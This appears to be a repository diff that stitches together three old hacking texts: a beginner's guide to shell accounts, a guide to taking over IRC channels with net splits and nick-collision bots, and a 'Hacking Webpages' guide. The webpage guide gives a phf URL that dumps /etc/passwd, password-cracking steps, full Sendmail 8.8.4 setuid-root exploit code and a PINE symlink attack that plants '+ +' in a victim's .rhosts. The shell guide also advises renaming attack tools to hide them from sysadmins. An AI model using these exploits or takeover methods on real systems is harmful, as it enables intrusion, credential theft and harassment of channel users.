password. Unfortunately, almost all shell accounts are set up so you must
expose your password to anyone who has hidden a sniffer anywhere between the
ISP that provides your PPP connection and your shell account ISP.
One solution is to insist on a shell account provider that runs ssh (secure
shell).
**************************************************
So where can you find these ISPs that will give you shell accounts? One good
source is http://www.celestin.com/pocia/. It provides links to Internet
Service Providers categorized by geographic region. They even have links to
allow you to sign up with ISPs serving the Lesser Antilles!
***********************************************
Evil Genius tip: Computer criminals and malicious hackers will often get a
guest account on a distant ISP and do their dirty work during the few hours
this guest account is available to them. Since this practice provides the
opportunity to cause so much harm, eventually it may become really hard to
get a test run on a guest account.
***********************************************
But if you want to find a good shell account the hacker way, heres what you
do. Start with a list of your favorite hacker Web sites. For example, lets
try http://ra.nilenet.com/~mjl/hacks/codez.htm.
You take the beginning part of the URL (Universal Resource Locator) as your
starting point. In this case it is “http://ra.nilenet.com.” Try surfing to
that URL. In many cases it will be the home page for that ISP. It should
have instructions for how to sign up for a shell account. In the case of
Nile Net we strike hacker gold:
Dial-up Accounts and Pricing
NEXUS Accounts
NEXUS Accounts include: Access to a UNIX Shell, full
Internet access, Usenet newsgroups, 5mb of FTP and/or
WWW storage space, and unlimited time.
One Time Activation Fee: $20.00
Monthly Service Fee: $19.95 or
Yearly Service Fee: $199.95
Plus which they make a big deal over freedom of online speech. And they host
a great hacker page full of these Guides to (mostly) Harmless Hacking!
How to Login to Your Shell Account
Now we assume you finally have a guest shell account and are ready to test
drive it. So now we need to figure out how to login. Now all you hacker
geniuses reading this, why dont you just forget to flame me for telling
people how to do something as simple as how to login. Please remember that
everyone has a first login. If you have never used Unix, this first time can
be intimidating. In any case, if you are a Unix genius you have no business
reading this Beginners Guide. So if you are snooping around here looking
for flamebait, send your flames to /dev/null.
***********************************************************
Newbie note: “Flames” are insulting, obnoxious rantings and ravings done by
people who are severely lacking in social skills and are a bunch of &$%@#!!
but who think they are brilliant computer savants. For example, this newbie
note is my flame against &$%@#!! flamers.
“/dev/null” stands for “device null.” It is a file name in a Unix operating
system. Any data that is sent to /dev/null is discarded. So when someone
says they will put something in “/dev/null” that means they are sending it
into permanent oblivion.
***********************************************************
The first thing you need to know in order to get into your shell account is
your user name and password. You need to get that information from the ISP
that has just signed you up. The second thing you need to remember is that
Unix is “case sensitive.” That means if your login name is “JoeSchmoe” the
shell will think “joeschmoe” is a different person than “JoeSchmoe” or
“JOESCHMOE.”
OK, so you have just connected to your shell account for the first time. You
may see all sorts of different stuff on that first screen. But the one thing
you will always see is the prompt:
login:
Here you will type in your user name.
In response you will always be asked :
Password:
Here you type in your password.
After this you will get some sort of a prompt. It may be a simple as:
%
or
$
or
>
Or as complicated as:
sleepy:~$
Or it may even be some sort of complicated menu where you have to choose a
“shell” option before you get to the shell prompt.
Or it may be a simple as:
#
**********************************************************
Newbie note: The prompt “#” usually means you have the superuser powers of
a “root” account. The Unix superuser has the power to do *anything* to the
computer. But you wont see this prompt unless either the systems
administrator has been really careless -- or someone is playing a joke on
you. Sometimes a hacker thinks he or she has broken into the superuser
account because of seeing the “#” prompt. But sometimes this is just a trick
the sysadmin is playing. So the hacker goes playing around in what he or she
thinks is the root account while the sysadmin and his friends and the police
are all laughing at the hacker.
**********************************************************
Ready to star
+351
View File
@@ -0,0 +1,351 @@
___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Beginners Series #3 Part 2
How to Get a *Good* Shell Account
____________________________________________________________
____________________________________________________________
In this section you will learn:
· how to explore your shell account
· Ten Meinel Hall of Fame Shell Account Exploration Tools
· how to decide whether your shell account is any good for hacking
· Ten Meinel Hall of Fame LAN and Internet Exploration Tools
· Meinel Hall of Infamy Top Five Ways to Get Kicked out of Your Shell Account
____________________________________________________________
How to Explore Your Shell Account
So youre in your shell account. Youve tried the “ls -alF” command and are
pretty sure this really, truly is a shell account. What do you do next?
A good place to start is to find out what kind of shell you have. There are
many shells, each of which has slightly different ways of working. To do
this, at your prompt give the command “echo $SHELL.” Be sure to type in the
same lower case and upper case letters. If you were to give the command
“ECHO $shell,” for example, this command wont work.
If you get the response:
/bin/sh
That means you have the Bourne shell.
If you get:
/bin/bash
Then you are in the Bourne Again (bash) shell.
If you get:
/bin/ksh
You have the Korn shell.
If the “echo $SHELL” command doesnt work, try the command “echo $shell,”
remembering to use lower case for “shell.” This will likely get you the answer:
/bin/csh
This means you have the C shell.
Why is it important to know which shell you have? For right now, youll want
a shell that is easy to use. For example, when you make a mistake in typing,
its nice to hit the backspace key and not see ^H^H^H on your screen. Later,
though, for running those super hacker exploits, the C shell may be better
for you.
Fortunately, you may not be stuck with whatever shell you have when you log
in. If your shell account is any good, you will have a choice of shells.
Trust me, if you are a beginner, you will find bash to be the easiest shell
to use. You may be able to get the bash shell by simply typing the word
“bash” at the prompt. If this doesnt work, ask tech support at your ISP for
a shell account set up to use bash. A great book on using the bash shell is
_Learning the Bash Shell_, by Cameron Newham and Bill Rosenblatt, published
by OReilly.
If you want to find out what other shells you have the right to use, try
“csh” to get the C shell; “ksh” to get the Korn shell, “sh” for Bourne
shell, “tcsh” for the Tcsh shell, and “zsh” for the Zsh shell. If you dont
have one of them, when you give the command to get into that shell you will
get back the answer “command not found.”
Now that you have chosen your shell, the next thing is to explore. See what
riches your ISP has allowed you to use. For that you will want to learn, and
I mean *really learn* your most important Unix commands and auxiliary
programs. Because I am supreme arbiter of what goes into these Guides, I get
to decide what the most important commands are. Hmm, “ten” sounds like a
famous number. So youre going to get the:
Ten Meinel Hall of Fame Shell Account Exploration Tools
1) man <command name>
This magic command brings up the online Unix manual. Use it on each of the
commands below, today! Wonder what all the man command options are? Try the
"man -k" option.
2) ls
Lists files. Jericho suggests “Get people in the habit of using "ls -alF".
This will come into play down
the road for security-conscious users.” Youll see a huge list of files that
you cant see with the “ls” command alone, and lots of details. If you see
such a long list of files that they scroll off the terminal screen, one way
to solve the problem is to use “ls -alF|more.”
3) pwd
Shows what directory you are in.
4) cd <directory>
Changes directories. Kewl directories to check out include /usr, /bin and
/etc. For laughs, jericho suggests exploring in /tmp.
5) more <filename>
This shows the contents of text files. Also you might be able to find “less”
and “cat” which are similar commands.
6) whereis <program name>
Think there might be a nifty program hidden somewhere? Maybe a game you
love? This will find it for you. Similar commands are “find” and “locate.”
Try them all for extra fun.
7) vi
An editing program. Youll need it to make your own files and when you start
programming while in your shell account. You can use it to write a really
lurid file for people to read when they finger you. Or try “emacs.” Its
another editing program and IMHO more fun than vi. Other editing programs
you may find include “ed” (an ancient editing program which I have used to
write thousands of lines of Fortran 77 code), “ex,” “fmt,” “gmacs,”
“gnuemacs,” and “pico.”
8) grep
Extracts information from files, especially useful for seeing whats in
syslog and shell log files. Similar commands are “egrep,” “fgrep,” and “look.”
9) chmod <filename>
Change file permissions.
10) rm <filename>
Delete file. If you have this command you should also find “cp” for copy
file, and “mv” for move file.
How to Tell Whether Your Shell Account Is any Good for Hacking
Alas, not all shell accounts are created equal. Your ISP may have decided
to cripple your budding hacker career by forbidding your access to
important tools. But you absolutely must have access to the top ten tools
listed above. In addition, you will need tools to explore both your ISPs
local area network (LAN) and the Internet. So in the spirit of being Supreme
Arbiter of Haxor Kewl, here are my:
Ten Meinel Hall of Fame LAN and Internet Exploration Tools
1) telnet <hostname> <port number or name>
If your shell account wont let you telnet into any port you want either on
its LAN or the Internet, you are totally crippled as a hacker. Dump your ISP
now!
2) who
Shows you who else is currently logged in on your ISPs LAN. Other good
commands to explore the other users on your LAN are “w,” “rwho, ” “users.”
3) netstat
All sorts of statistics on your LAN, including all Internet connections. For
real fun, try “netstat -r” to see the kernel routing table. However, jericho
warns “Be careful. I was teaching a friend the basics of summing up a Unix
system and I told her to do that and ifconfig. She was booted off the system
the next day for hacker suspicion even though both are legitimate commands
for users.”
4) whois <hostname>
Get lots of information on Internet hosts outside you LAN.
5) nslookup
Get a whole bunch more information on other Internet hosts.
6) dig
Even more info on other Internet hosts. Nslookup and dig are not redundant.
Try to get a shell account that lets you use both.
7) finger
Not only can you use finger inside your LAN. It will sometimes get you
valuable information about users on other Internet hosts.
8) ping
Find out if a distant computer is alive and run diagnostic tests -- or just
plain be a meanie and clobber people with pings. (I strongly advise
*against* using ping to annoy or harm others.)
9) traceroute
Kind of like ping with attitude. Maps Internet connections, reveals routers
and boxes running firewalls.
10) ftp
Use it to upload and download files to and from other computers.
If you have all these tools, youre in great shape to begin your hacking
career. Stay with your ISP. Treat it well.
Once you get your shell account, you will probably want to supplement the
“man” command with a good Unix book . Jericho recommends _Unix in a
Nutshell_ published by O'Reilly. "It is the ultimate Unix command reference,
and only costs 10 bucks. O'Reilly r00lz."
How to Keep from Losing Your Shell Account
So now you have a hackers dream, an account on a powerful computer running
Unix. How do you keep this dream account? If you are a hacker, that is not
so easy. The problem is that you have no right to keep that account. You can
be kicked off for suspicion of being a bad guy, or even if you become
inconvenient, at the whim of the owners.
Meinel Hall O Infamy
Top Five Ways to Get Kicked out of Your Shell Account
1) Abusing Your ISP
Lets say you are reading Bugtraq and you see some code for a new way to
break into a computer. Panting with excitement, you run emacs and paste in
the code. You fix up the purposely crippled stuff someone put in to keep
total idiots from running it. You tweak it until it runs under your flavor
of Unix. You compile and run the program against your own ISP. It works! You
are looking at that “#” prompt and jumping up and down yelling “I got root!
I got root!” You have lost your hacker virginity, you brilliant dude, you!
Only, next time you go to log in, your password doesnt work. You have been
booted off your ISP. NEVER, NEVER ABUSE YOUR OWN ISP!
*********************************************************
You can go to jail warning: Of course, if you want to break into another
computer, you must have the permission of the owner. Otherwise you are
breaking the law.
*********************************************************
2) Ping Abuse.
Another temptation is to use the powerful Internet connection of your shell
account (usually a T1 or T3) to ping the crap out of the people you dont
like. This is especially common on Internet Relay Chat. Thinking of ICBMing
or nuking that dork? Resist the temptation to abuse ping or any other
Internet Control Message Protocol attacks. Use ping only as a diagnostic
tool, OK? Please? Or else!
3) Excessive Port Surfing
Port surfing is telnetting to a specific port on another computer. Usually
you are OK if you just briefly visit another computer via telnet, and dont
go any further than what that port offers to the casual visitor. But if you
keep on probing and playing with another computer, the sysadmin at the
target computer will probably email your sysadmin records of your little
visits. (These records of port visits are stored in “messages,” and
sometimes in “syslog” depending on the configuration of your target computer
-- and assuming it is a Unix system.)
Even if no one complains about you, some sysadmins habitually check the
shell log files that keep a record of everything you or any other user on
the system has been doing in their shells. If your sysadmin sees a pattern
of excessive attention to one or a few computers, he or she may assume you
are plotting a break-in. Boom, your password is dead.
4) Running Suspicious Programs
If you run a program whose primary use is as a tool to commit computer
crime, you are likely to get kicked off your ISP. For example, many ISPs
have a monitoring system that detects the use of the program SATAN. Run
SATAN from your shell account and you are history.
**********************************************************
Newbie note: SATAN stands for Security Administration Tool for Analyzing
Networks. It basically works by telnetting to one port after another of the
victim computer. It determines what program (daemon) is running on each
port, and figures out whether that daemon has a vulnerability that can be
used to break into that computer. SATAN can be used by a sysadmin to figure
out how to make his or her computer safe. Or it may be just as easily used
by a computer criminal to break into someone elses computer.
***********************************************************
5) Storing Suspicious Programs
Its nice to think that the owners of your ISP mind their own business. But
they dont. They snoop in the directories of their users. They laugh at your
email. OK, maybe they are really high-minded and resist the temptation to
snoop in your email. But chances are high that they will snoop in your shell
log files that record every keystroke you make while in your shell account.
If they dont like what they see, next they will be prowling your program files.
One solution to this problem is to give your evil hacker tools innocuous
names. For example, you could rename SATAN to ANGEL. But your sysdamin may
try running your programs to see what they do. If any of your programs turn
out to be commonly used to commit computer crimes, you are history.
Wait, wait, you are saying. Why get a shell account if I can get kicked out
even for legal, innocuous hacking? After all, SATAN is legal to use. In
fact, you can learn lots of neat stuff with SATAN. Most hacker tools, even
if they are primarily used to commit crimes, are also educational. Certainly
if you want to become a sysadmin someday you will need to learn how these
programs work.
Sigh, you may as well learn the truth. Shell accounts are kind of like
hacker training wheels. They are OK for beginner stuff. But to become a
serious hacker, you either need to find an ISP run by hackers who will
accept you and let you do all sorts of suspicious things right under their
nose. Yeah, sure. Or you can install some form of Unix on your home
computer. But thats another Guide to (mostly) Harmless Hacking (Vol. 2
Number 2: Linux!).
If you have Unix on your home computer and use a PPP connection to get into
the Internet, your ISP is much less likely to snoop on you. Or try making
friends with your sysadmin and explaining what you are doing. Who knows, you
may end up working for your ISP!
In the meantime, you can use your shell account to practice just about
anything Unixy that wont make your sysadmin go ballistic.
*************************************************************
Would you like a shell account that runs industrial strength Linux -- with
no commands censored? Want to be able to look at the router tables, port
surf all.net, and keep SATAN in your home directory without getting kicked
out for suspicion of hacking? Do you want to be able to telnet in on ssh
(secure shell)so no one can sniff your password? Are you willing to pay $30
per month for unlimited access to this hacker playground? How about a seven
day free trial account? Email haxorshell@techbroker.com for details.
*************************************************************
In case you were wondering about all the input from jericho in this Guide,
yes, he was quite helpful in reviewing this and making suggestions. Jericho
is a security consultant and also runs his own Internet host,
obscure.sekurity.org. Thank you, jericho@dimensional.com, and happy hacking!
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See either
http://www.cs.utexas.edu/users/matt/hh.html (the official Happy Hacker
archive site)
http://www.geocities.com/TimesSquare/Arcade/4594
http://www.silitoad.org
http://base.kinetik.org
http://www.anet-chi.com/~dsweir
http://www.tacd.com/zines/gtmhh/
http://ra.nilenet.com/~mjl/hacks/codez.htm
http://www.ilf.net/brotherhood/index2.html
Subscribe to our discussion list by emailing to hacker@techbroker.com with
message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes?
Send your messages to hacker@techbroker.com. To send me confidential email
(please, no discussions of illegal activities) use cmeinel@techbroker.com
and be sure to state in your message that you want me to keep this
confidential. If you wish your message posted anonymously, please say so!
Direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO
(mostly) HARMLESS HACKING on your Web site as long as you leave this notice
at the end.
________________________________________________________
Carolyn Meinel
M/B Research -- The Technology Brokers
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+243
View File
@@ -0,0 +1,243 @@
Hacking IRC - The Definitive Guide
Copyright 1996 klider@panix.com Welcome to Hacking IRC- The Definitive
Guide. The purpose of this page if you have not already guessed is to
provide what I consider optimal methodology for hacking IRC channels. In
addition, I provide some of the better channels to hack as well as fun
things to do while "owning a channel."
Contents
* Section 1-- Why Hack IRC?
* Section 2--Requisite Tools
* Section 3--What It Takes To Gain Control
* Section 4--Link Looker(LL)
* Section 5--Bots and Scripts
* Section 6--Multi-Collide-Bot(MCB)
* Section 7--Pre-Takeover Preparation
* Section 8--Thing To Do ONce You "Own" the Channel
* Section 9--Best Channels to Hack
[Image] See me if you dare.
Section 1-Why Hack IRC?
I have often asked myself this question and the answers are varied and
numerous. One of the primary reasons for hacking IRC channels is due to
shear boredom. However a multitude of secondary reasons exist. Foremost
among these is the "that asshole op i nsulted me and/or kicked me and/or
banned me from the channel and I WANT REVENGE! This is a perfectly valid
excuse and boredom is not a necessary condition for implementing a takeover
of an IRC channel. Nor is it a necessary condition that the reason yo u
were insulted and/or kicked and/or banned was because in fact you are an
asshole. All that is necessary is the will, the desire, a bit of skill, and
of course the tools, which convieniently brings me to my next section.
Section 2-Requisite Tools
Any decent craftsmen needs a good set of tools and IRC hackers are no
exception. Without the proper tools you are dead in the water. All of the
tools I describe below are available on public ftp sites. Before I launch
into a discussion of what you wil l need, it is important to point out that
if you are reading this document from your ppp/slip account you might
consider geeting a shell account if you are serious about hackin. Hacking
IRC from a slip/ppp is much more complicated than doing so from a sh ell
account. There are those who will debate this but my experience has shown
that mIRC or any of the other shareware IRC programs for the PC are no
match for the speed and ease of use that an IRC shell script allows for.
Thus the first tool required fo r hacking is an excellent irc shell script.
If you have already used IRC via a shell account and are still reading this
document you probably already have a script, which means you are well on
your way! As far as IRC shell scripts go, my personal favor ite is Lice -
again available publically via ftpFTP. Other scripts exist but the richness
and power of the LICE commands I believe is second to none. Now while it is
possible to stop here and hack ops with just a script, you would
effectively be putting yourself needlessly at a handicap. Therefore I
reccommend these additional two tools: 1)Multi-Collide-Bot(MCB) and 2)LInk
Looker(LL). These two C programs are your infantry and intellige nce
respectively. Again both are available via FTP and both are C programs and
therefore need to be compiled.
What It Takes To Gain Control
Without going into much detail clearly in order to effectively gain control
of an IRC channel you must be the only op on your channel. If you are still
clueless at this point, that is to say..You should be the only guy/gal with
the @ in front of your nic k. Once you have accomplished this, the channel
is YOURS. Of course, that is until it is taken back or you decide to cease
hacking the channel. There are a number of ways to effectively gain ops on
a channel and I will start with the simplest, then mov e to the
increasingly more complex and finesse laden methods. By far and away the
easiet method of gaining ops on a channel is to ask. You laugh eh? Well
don't. Clearly as hackers grow more prevelant on IRC the asking method
becomes more and more unlikely to succeed. This is especially true of the
bigger and well established channels that have cultures onto themselves
such as #Netsex, #Teensex, #Windows95, #Bawel, #BDSM, #Blaklife, #Texas,
#Hack, and any of the #Warez channels and a whole host of others. To gain
ops in these channels you must become a channel re gular (i.e. one that
hangs there freqently and becomes a known and trusted member of the
channel). Since you have neither the time nor the desire to make friends on
the channel you ultimately want to hack ops on, the asking method is the
last thing you want to do on all but the smaller more ethereal channels,
where you obviously stand a better although still slim chance of gaining
ops through a request.. One important exception to the ask method is
through the use of anonirc which can be used on any ch annel but has severe
limitations..more on this later. But of course you didn't come this far to
be taught how to ask for ops..so lets proceed with the next lesson. Aside
from asking there are essentially two other ways of gaining ops. The first
is through splits and the second is through anonirc. The following
discussion mostly relates to splits but I will touch on anonirc briefly at
the end. What is a split? A split occurs when the IRC server you are
communicating on detaches from the rest of the net. If you are in a channel
and by chance the only one on a particular server that splits away, you
will not only find yourself alone on the channel, but will now ha ve the
opportunity to gain ops. In order to do this you need to leave and rejoin
the channel in which case you will now find yourself with the little @ in
front of your nick. When your server rejoins you will have ops on the
channel. Now you say, "Wow, thats easy enough". Wrong. More likely than
not, especially on a bigger channel a number of things are likely to occur
that will remove your op status. Remember now the goal here is to keep ops
so you can "Have Your Way". Also and more importantly, if you go into a
channel and wait around hoping the server you are on splits, you might grow
old and die first. Therefore, what is a wannbe IRC hacker to do? Link
Looker is your answer.
Link Looker
Link Looker is a lovely little program that acts as your intelligence
officer. Without getting into the complexities or its mechanics, what it
effectively does is to give your a message anyti me a particular server
detaches from the net and a message when it rejoins. Is the methodology
becoming clearer now? Yes! Thats right! When LL tells you that a server is
split ,you connect to that server and join the channel you seek to hack ops
on and h ope nobody else split from the channel on that server(if this
occurs you will not get ops).. If you find yourself alone, you will have
ops and a fighting chance to gain control of the channel. It is important
to realize that on many channels, just getti ng ops via a split and waiting
for a rejoin is sufficient for gaining control of a channel. This is
particularly true of small to medium sized channels as well as channels
that are not organized or do not have Bots (more on this later), You simply
wait for the server to rejoin and once the channel is full you execute your
mass deop command (this is on your script and the key element in getting
rid of any other ops) and you will be the only op left. The channel is
yours and go do your thing! On bigger more organized channels, things won't
be so easy due to the presense of Bots as well as the presense of scripts
used by existing human ops.
Bots and Scripts
Bigger more organized channels inevitably have a Bot(Robot) or multiple
Bots. Bots are essentially suped up scripts that attempt to maintain ops on
a channel by their continuous presensce on channel. Additionally Bots
provide a number of channel mainten ance tasks such as opping known members
of the channel (either automatically or through password requests),
providing notes, and other information. Bots however are primarlly used for
keeping ops on channel and depending on the type of Bot, defending aga inst
IRC hackers. Bots come in many varieties and types but the best of them do
a good job of deoping spliters(thats you silly..you are opped on a split
and when you rejoin the bot will deop you). Not only will Bots deop
you..many of the human ops have scripts (such as LIce) that depending on
the settings employed will deop you as well. Now with the prevalance of
powerful scripts on IRC a recent phenomona is the occurse of the desynch.
This is a nasty event that takes place when you rejoin from a spli t and
your script deops the existing ops and the existing ops deop you at the
same time. What this does is confuse the shit out of the servers and cause
them to desynchronize from one another. This is to be avoided at all costs.
When this happens you w ill effectively become desynched from a large
portion of the net and most the channel, (depending on what server you rode
in on). What's worse is that you will think you have ops( which you will
for that server) but in reality you won't and you will be w asting your
time. So how with the prevalence of super Bots and Human ops with scripts
do you take the channel? Using MCB of course!
Multi-Collide-Bot(MCB)
Multi-Collide-Bot (MCB) is a powerful tool and your best friend. MCB is an
even lovelier program that creates a clone of a nick you want to kill
(almsot always an op on the channel you are tr ying to hack) on a server
that has split(yes the one Link Looker informed you of). Basically you feed
MCB the name or names of the nick you want to kill and tell it what split
server to establish those clones and upon rejoin.BAM/SMACK/KIILL!! Yes
thats r ight, the target is thrown out of the channel(losing ops) and must
re-establish a connection with a server to get back onto IRC and into the
channel. So yes, you have figured it out. If you kill all of the ops on a
channel and you ride in on a split you will be the only op in the channel.
Let me assure you there is nothing like seeing the nick kill messages of
the ops you have targeted as you ride in on the split.
Pre-Takeover Preparation
There are a number of things you can do before you attempt to take over an
IRC Channel to make things easier and be as well prepared as you can
possibly be. 1)Pre-Attack Observation. Plain and simple you must know who
you are attacking. One of the most important things you can do as you sit
and observe the channel is to determine which bots and/or human ops are
deopping on rejoins. These are the nicks you want to target first. You will
fail if you don't kill these nicks and rejoin because you are lik ely to
cause a desynch(discussed above). However, it is essential to make sure you
kill all of the ops. Leaving just one op alive means you have lost that
battle and must now regroup and wait for another split. It is important to
watch out for ops chan ging their nicks if they detect a split. If they do
this, the mcb you tagged with their nick will be useless to you. The way I
prevent this is to be on both sides of the split. That is to be opped in
the channel on the split server and have a clone in the channel on the
other side of the split monitoring the goings on, telling you if ops change
nicks or new people are opped (in which case you create a new mcb with
their name on it).
Things To Do Once You "Own" the Channel
Once you own the channel, the decision is clearly yours on how you want to
proceed and needless to say the number of things you can do is endless.
However, let me share with you a number of time tested ideas that are sure
to give you a thrill not to ment ion totally piss of the channel you have
now hacked. The first thing you can do is to taunt the former ops of the
channel. That is to say, they will probably be cursing you and telling you
what a loser you are for hacking the channel. They will say thi ngs like
"get a life, do something more productive". Remember don't take it
personally. You have to keep in mind that it is the formers ops who in fact
are the ones who need to get a life, considering the only power they have
or make that had (if you su ccessfully hacked the channel) was to have ops
in the first place. So you can continue to taunt and if they get relay
billegerent you can kick them off the channel. They will undoubtedly come
back within a second or two and then you can say something li ke, "Now, now
I am in control of the channel and I will not tolerate such language and
behavior. If you are unable to control yourself I will be forced to ban
you." Now this is sure to get some violent response from the former op in
which case you subse quently kick and ban them and move onto the next
person. Another thing I like to do is to word ban. This is particularly
easy if you have LICE. What you do is pick a word that if typed onto the
screen by any of the channel members, will automatically r esult in you
kicking them off the channel with the reason that word is banned. This
method is particularly good in channels like #teensex where people are
always saying the word sex, male, female, teen, age, etc. All you do is ban
those words and watch the kicks begin to fly. Another thing I like to do is
moderate the channel. What this does with the /mode +m command is to make
it such that nobody on channel can speak. This is a particularly good thing
to do when many of the channel members are getti ng out of hand and you
want to make some sort of statement without anybody interrupting you. Yes
all eyes will be trained on you. If you want to be really mean, when you
are finished hacking the channel, you can leave it moderated in which case
nobody w ill be able to speak and the channel is effectively shut down.
Other things to do which are nasty as well are to kick everybody out of the
channel and make it invite only, effectively shutting it down as well.
Think of your own creative things to do. I would love to hear about
them..email me..if they are particularly interesting I will include them in
this page with an attribution if you like.
Best Channels to Hack
#limbaugh
#rush
#lamerz
#newbies
email klider@panix.com
+201
View File
@@ -0,0 +1,201 @@
Hacking Webpages
The Ultimate Guide
By Virtual Circuit and Psychotic
Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.
Getting the Password File Through FTP
Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well.
Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.
The PHF Technique
Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.
The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
Telnet and Exploits
Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need.
Its best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. Im going to list a few below but the list of exploits is endless.
This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
and now on to another exploit. Im going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting
the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is the attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
